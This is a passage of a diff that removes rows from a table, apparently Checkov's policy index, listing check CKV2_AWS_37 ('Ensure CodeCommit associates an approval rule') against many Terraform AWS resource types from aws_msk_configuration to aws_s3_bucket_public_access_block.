-|  925 | CKV2_AWS_37     | resource | aws_msk_configuration                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  926 | CKV2_AWS_37     | resource | aws_nat_gateway                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  927 | CKV2_AWS_37     | resource | aws_neptune_cluster                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  928 | CKV2_AWS_37     | resource | aws_neptune_cluster_instance                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  929 | CKV2_AWS_37     | resource | aws_neptune_cluster_parameter_group                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  930 | CKV2_AWS_37     | resource | aws_neptune_cluster_snapshot                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  931 | CKV2_AWS_37     | resource | aws_neptune_event_subscription                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  932 | CKV2_AWS_37     | resource | aws_neptune_parameter_group                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  933 | CKV2_AWS_37     | resource | aws_neptune_subnet_group                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  934 | CKV2_AWS_37     | resource | aws_network_acl                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  935 | CKV2_AWS_37     | resource | aws_network_acl_rule                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  936 | CKV2_AWS_37     | resource | aws_network_interface                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  937 | CKV2_AWS_37     | resource | aws_network_interface_attachment                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  938 | CKV2_AWS_37     | resource | aws_network_interface_sg_attachment                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  939 | CKV2_AWS_37     | resource | aws_opsworks_application                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  940 | CKV2_AWS_37     | resource | aws_opsworks_custom_layer                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  941 | CKV2_AWS_37     | resource | aws_opsworks_ganglia_layer                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  942 | CKV2_AWS_37     | resource | aws_opsworks_haproxy_layer                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  943 | CKV2_AWS_37     | resource | aws_opsworks_instance                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  944 | CKV2_AWS_37     | resource | aws_opsworks_java_app_layer                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  945 | CKV2_AWS_37     | resource | aws_opsworks_memcached_layer                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  946 | CKV2_AWS_37     | resource | aws_opsworks_mysql_layer                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  947 | CKV2_AWS_37     | resource | aws_opsworks_nodejs_app_layer                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  948 | CKV2_AWS_37     | resource | aws_opsworks_permission                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  949 | CKV2_AWS_37     | resource | aws_opsworks_php_app_layer                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  950 | CKV2_AWS_37     | resource | aws_opsworks_rails_app_layer                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  951 | CKV2_AWS_37     | resource | aws_opsworks_rds_db_instance                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  952 | CKV2_AWS_37     | resource | aws_opsworks_stack                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  953 | CKV2_AWS_37     | resource | aws_opsworks_static_web_layer                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  954 | CKV2_AWS_37     | resource | aws_opsworks_user_profile                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  955 | CKV2_AWS_37     | resource | aws_organizations_account                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  956 | CKV2_AWS_37     | resource | aws_organizations_organization                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  957 | CKV2_AWS_37     | resource | aws_organizations_organizational_unit                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  958 | CKV2_AWS_37     | resource | aws_organizations_policy                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  959 | CKV2_AWS_37     | resource | aws_organizations_policy_attachment                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  960 | CKV2_AWS_37     | resource | aws_pinpoint_adm_channel                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  961 | CKV2_AWS_37     | resource | aws_pinpoint_apns_channel                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  962 | CKV2_AWS_37     | resource | aws_pinpoint_apns_sandbox_channel                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  963 | CKV2_AWS_37     | resource | aws_pinpoint_apns_voip_channel                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  964 | CKV2_AWS_37     | resource | aws_pinpoint_apns_voip_sandbox_channel                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  965 | CKV2_AWS_37     | resource | aws_pinpoint_app                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  966 | CKV2_AWS_37     | resource | aws_pinpoint_baidu_channel                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  967 | CKV2_AWS_37     | resource | aws_pinpoint_email_channel                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  968 | CKV2_AWS_37     | resource | aws_pinpoint_event_stream                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  969 | CKV2_AWS_37     | resource | aws_pinpoint_gcm_channel                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  970 | CKV2_AWS_37     | resource | aws_pinpoint_sms_channel                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  971 | CKV2_AWS_37     | resource | aws_placement_group                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  972 | CKV2_AWS_37     | resource | aws_proxy_protocol_policy                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  973 | CKV2_AWS_37     | resource | aws_qldb_ledger                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  974 | CKV2_AWS_37     | resource | aws_quicksight_group                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  975 | CKV2_AWS_37     | resource | aws_quicksight_user                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  976 | CKV2_AWS_37     | resource | aws_ram_principal_association                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  977 | CKV2_AWS_37     | resource | aws_ram_resource_association                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  978 | CKV2_AWS_37     | resource | aws_ram_resource_share                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  979 | CKV2_AWS_37     | resource | aws_ram_resource_share_accepter                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  980 | CKV2_AWS_37     | resource | aws_rds_cluster                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  981 | CKV2_AWS_37     | resource | aws_rds_cluster_endpoint                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  982 | CKV2_AWS_37     | resource | aws_rds_cluster_instance                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  983 | CKV2_AWS_37     | resource | aws_rds_cluster_parameter_group                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  984 | CKV2_AWS_37     | resource | aws_rds_global_cluster                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  985 | CKV2_AWS_37     | resource | aws_redshift_cluster                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  986 | CKV2_AWS_37     | resource | aws_redshift_event_subscription                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  987 | CKV2_AWS_37     | resource | aws_redshift_parameter_group                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  988 | CKV2_AWS_37     | resource | aws_redshift_security_group                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  989 | CKV2_AWS_37     | resource | aws_redshift_snapshot_copy_grant                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  990 | CKV2_AWS_37     | resource | aws_redshift_snapshot_schedule                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  991 | CKV2_AWS_37     | resource | aws_redshift_snapshot_schedule_association              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  992 | CKV2_AWS_37     | resource | aws_redshift_subnet_group                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  993 | CKV2_AWS_37     | resource | aws_resourcegroups_group                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  994 | CKV2_AWS_37     | resource | aws_root                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  995 | CKV2_AWS_37     | resource | aws_root_access_key                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  996 | CKV2_AWS_37     | resource | aws_route                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  997 | CKV2_AWS_37     | resource | aws_route53_delegation_set                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  998 | CKV2_AWS_37     | resource | aws_route53_health_check                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  999 | CKV2_AWS_37     | resource | aws_route53_query_log                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1000 | CKV2_AWS_37     | resource | aws_route53_record                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1001 | CKV2_AWS_37     | resource | aws_route53_resolver_endpoint                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1002 | CKV2_AWS_37     | resource | aws_route53_resolver_rule                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1003 | CKV2_AWS_37     | resource | aws_route53_resolver_rule_association                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1004 | CKV2_AWS_37     | resource | aws_route53_vpc_association_authorization               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1005 | CKV2_AWS_37     | resource | aws_route53_zone                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1006 | CKV2_AWS_37     | resource | aws_route53_zone_association                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1007 | CKV2_AWS_37     | resource | aws_route_table                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1008 | CKV2_AWS_37     | resource | aws_route_table_association                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1009 | CKV2_AWS_37     | resource | aws_s3_access_point                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1010 | CKV2_AWS_37     | resource | aws_s3_account_public_access_block                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1011 | CKV2_AWS_37     | resource | aws_s3_bucket                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1012 | CKV2_AWS_37     | resource | aws_s3_bucket_analytics_configuration                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1013 | CKV2_AWS_37     | resource | aws_s3_bucket_inventory                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1014 | CKV2_AWS_37     | resource | aws_s3_bucket_metric                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1015 | CKV2_AWS_37     | resource | aws_s3_bucket_notification                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1016 | CKV2_AWS_37     | resource | aws_s3_bucket_object                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1017 | CKV2_AWS_37     | resource | aws_s3_bucket_policy                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1018 | CKV2_AWS_37     | resource | aws_s3_bucket_public_access_block                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
